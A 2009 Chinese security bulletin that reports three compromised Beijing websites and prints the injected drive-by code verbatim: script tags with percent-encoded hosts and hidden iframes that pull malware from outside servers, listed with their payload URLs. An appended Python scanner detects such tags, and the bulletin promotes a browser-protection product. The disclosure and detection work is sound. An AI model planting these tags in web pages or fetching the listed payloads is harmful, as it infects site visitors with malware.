Website Malware Injection (挂马) Bulletin, February 2, 2009

Source: 岁月联盟  Editor: zhuzhu  Date: 2009-02-03
  The KnownSec team (知道创宇安全团队) today captured the following websites carrying injected malicious code: 北京英展画室, 北京道可特律师事务所, and 北京中创安照明科技发展有限公司.
  北京英展画室 (hxxp://www.bjyzhs.com.cn/) had malicious code injected at the bottom of the page:
  <script src=hxxp://%68%68%6A%32%2E%63%6E></script><script src=hxxp://%68%68%6A%32%2E%63%6E></script><script src=hxxp://%68%68%6A%32%2E%63%6E></script><script src=hxxp://%68%68%6A%32%2E%63%6E></script><script src=hxxp://%68%68%6A%32%2E%63%6E></script><script src=hxxp://%68%68%6A%33%2E%63%6E></script><script src=hxxp://%68%68%6A%33%2E%63%6E></script><script src=hxxp://%76%76%6B%33%2E%63%6E></script><script src=hxxp://%76%76%6B%33%2E%63%6E></script><script src=hxxp://%76%76%6B%33%2E%63%6E></script><script src=hxxp://%76%76%6B%33%2E%63%6E></script><script src=hxxp://%76%76%6B%35%2E%63%6E></script><script src=hxxp://%76%76%6B%35%2E%63%6E></script><script src=hxxp://%68%68%6A%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script>
  The hostnames are URL percent-encoded; decoded, the malicious link addresses are:
  hxxp://hhj2.cn
  hxxp://hhj3.cn
  hxxp://vvk3.cn
  hxxp://vvk5.cn
  hxxp://hhj7.cn
  hxxp://vvk7.cn
  Through vulnerability exploitation, the following malware is ultimately downloaded:
  hxxp://d.weixk.com/new/a1.css
  hxxp://d.oixka.com/new/a1.css
  北京道可特律师事务所 (hxxp://www.dtlawyers.com.cn/count/mystat.asp) was injected with malicious code:
  <iframe src=hxxp://www.51txx.cn/sea.htm width=0 height=0></iframe><script src=hxxp://%68%68%6A%32%2E%63%6E></script><script src=hxxp://%68%68%6A%33%2E%63%6E></script><script src=hxxp://%68%68%6A%33%2E%63%6E></script><script src=hxxp://%68%68%6A%33%2E%63%6E></script><script src=hxxp://%76%76%6B%33%2E%63%6E></script><script src=hxxp://%76%76%6B%33%2E%63%6E></script><script src=hxxp://%76%76%6B%33%2E%63%6E></script><script src=hxxp://%76%76%6B%35%2E%63%6E></script><script src=hxxp://%76%76%6B%35%2E%63%6E></script><script src=hxxp://%68%68%6A%37%2E%63%6E></script><script src=hxxp://%68%68%6A%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><iframe src=hxxp://www.51txx.cn/sea.htm width=0 height=0></iframe><script src=hxxp://%68%68%6A%32%2E%63%6E></script><script src=hxxp://%68%68%6A%33%2E%63%6E></script><script src=hxxp://%68%68%6A%33%2E%63%6E></script><script src=hxxp://%68%68%6A%33%2E%63%6E></script><script src=hxxp://%76%76%6B%33%2E%63%6E></script><script src=hxxp://%76%76%6B%33%2E%63%6E></script><script src=hxxp://%76%76%6B%33%2E%63%6E></script><script src=hxxp://%76%76%6B%35%2E%63%6E></script><script src=hxxp://%76%76%6B%35%2E%63%6E></script><script src=hxxp://%68%68%6A%37%2E%63%6E></script><script src=hxxp://%68%68%6A%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script 
src=hxxp://%76%76%6B%37%2E%63%6E></script>
  document.write("<script>var url='hxxp://www.dtlawyers.com.cn/count/';var style='';</script>");
  document.write("<script src="+url+"/stat.asp?style="+style+"&referer="+escape(document.referrer)+"&screenwidth="+(screen.width)+"></script>");
  Through vulnerability exploitation, the following malware is ultimately downloaded:
  hxxp://d.weixk.com/new/a1.css
  hxxp://d.oixka.com/new/a1.css
  北京中创安照明科技发展有限公司 (hxxp://www.bjzca.com/) was injected with malicious code:
  <ifRame sRc=hxxp://www.2009dddd.cn/one/a46.htm width=50 height=0 boRdeR=0></ifRame>
  <script language=javascript src=hxxp://%77%2E%39%34%73%61%6F%6D%6D%2E%63%6F%6D/js.js></script>
  <iframe src=hxxp://www.bengchizz.cn/b3.htm width=50 height=0 border=0></iframe>
  <script language=javascript src=hxxp://%6C%2E%39%34%73%61%6F%6D%6D%2E%63%6F%6D/js.js></script>
  Through vulnerability exploitation, the following malware is ultimately downloaded:
  hxxp://m.wuc8.com/mm.exe
  hxxp://d.weixk.com/new/a1.css
  hxxp://d.oixka.com/new/a1.css
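  Recommended response: install the 365门神 software, which protects the IE browser while it opens websites and blocks network-borne web page attacks that carry malicious code. Usage help and download: http://365menshen.com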
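
  For site owners checking their own pages, the sketch below is an added example (not KnownSec's tooling and not part of the original bulletin). It finds external script/iframe tags of the kind quoted above, percent-decodes the src, and collapses repeats. The two heuristics (percent-encoded host, zero-size iframe) and the names SAMPLE, scan and summarize are assumptions of this example; the sample HTML is constructed from tags shown in this bulletin.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample modelled on tags quoted in this bulletin (defanged hxxp kept).
SAMPLE = (
    "<script src=hxxp://%68%68%6A%32%2E%63%6E></script>"
    "<script src=hxxp://%68%68%6A%32%2E%63%6E></script>"
    "<ifRame sRc=hxxp://www.2009dddd.cn/one/a46.htm width=50 height=0 boRdeR=0></ifRame>"
    "<script language=javascript src=hxxp://%77%2E%39%34%73%61%6F%6D%6D%2E%63%6F%6D/js.js></script>"
    "<script src=/static/site.js></script>"
)

# Case-insensitive so mixed-case tags such as <ifRame sRc=...> are still caught.
TAG_RE = re.compile(r"<(script|iframe)\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

def parse_attrs(raw):
    """Return attributes with lower-cased names; handles quoted and unquoted values."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
            for m in ATTR_RE.finditer(raw)}

def scan(html):
    """Return (tag, decoded_src, reasons) for each suspicious external include."""
    findings = []
    for tag, raw in TAG_RE.findall(html):
        attrs = parse_attrs(raw)
        src = attrs.get("src", "")
        m = re.match(r"(?:https?|hxxps?)://([^/?#]+)", src, re.I)
        if not m:
            continue  # relative or inline source: not an external include
        reasons = []
        if "%" in m.group(1):
            reasons.append("percent-encoded host")  # heuristic assumed by this example
        if tag.lower() == "iframe" and "0" in (attrs.get("width"), attrs.get("height")):
            reasons.append("zero-size iframe")      # heuristic assumed by this example
        if reasons:
            findings.append((tag.lower(), unquote(src), tuple(reasons)))
    return findings

def summarize(html):
    """Collapse repeated injections into counts per decoded URL."""
    return Counter(url for _, url, _ in scan(html))

if __name__ == "__main__":
    for url, count in summarize(SAMPLE).items():
        print(count, url)
```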